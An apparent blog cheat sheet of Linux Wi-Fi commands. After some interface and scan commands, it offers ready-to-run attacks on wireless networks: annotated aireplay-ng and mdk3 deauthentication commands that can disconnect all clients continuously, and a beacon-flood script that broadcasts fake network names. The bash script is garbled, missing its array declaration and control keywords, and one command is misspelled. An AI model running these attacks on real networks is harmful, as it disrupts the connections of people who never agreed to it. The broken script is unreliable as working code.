A short list of some things you can do with wireless on a linux box. Have fun.

Determine Modes your NIC is capable of.

airmon-ng (find PHY# for your NIC)

iw phy phy1 info | grep –A8 modes

Passive Scan (Should not generate any frames)

iw dev wlan0 scan passive | grep SSID

Active Scan

iw dev wlan0 scan | grep SSID
airmon-ng start wlan0
airodump-ng mon0
iwconfig wlan0 channel #

iwconfig wlan0 essid <ssid>
iwconfig wlan0 mode managed


iwconfig mon0 channel #

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
  • ath0 is the interface name

Deauthorization with **MDK3*

airmon-ng start wlan0
dk3 mon0 d


mdk3 mon0 d -w whitelist (deauth everything not listed in file)


mdk3 mon0 d -b blacklist (deauth everything listed in file)

d - deauthorization mode
w - whitelist
b - blacklist

Broadcast Network Names with MDK3

airmon-ng start wlan0
mdk3 mon0 b -c 11 -f ssid_names
  • b - beacon flood mode
  • c - channel
  • f - text file with ssid names Everything you need to run a beacon flood in one script.
"FBI Van #12"
"Customer Wireless"
"Verizon Hotspot"
"l33t haxor net"

if [ -f ssid_names ]
echo -e "\e[1;31mDeleting list of network names\e[0m"
rm -f ssid_names

echo -e "\e[1;32mCreating list of network names\e[0m"
for i in "${networks[@]}"
echo $i >> ssid_names

if [[ -n $(airmon-ng | grep mon0) ]]
echo -e "\e[1;32mMon0 interface exists\e[0m"
echo -e "\e[1;32mStarting AirMon on wlan0\e[0m"
airmon-ng start wlan0

echo -e "\e[1;32mBegin beacon flood on mon0\e[0m"
mdk3 mon0 b -c 11 -f ssid_names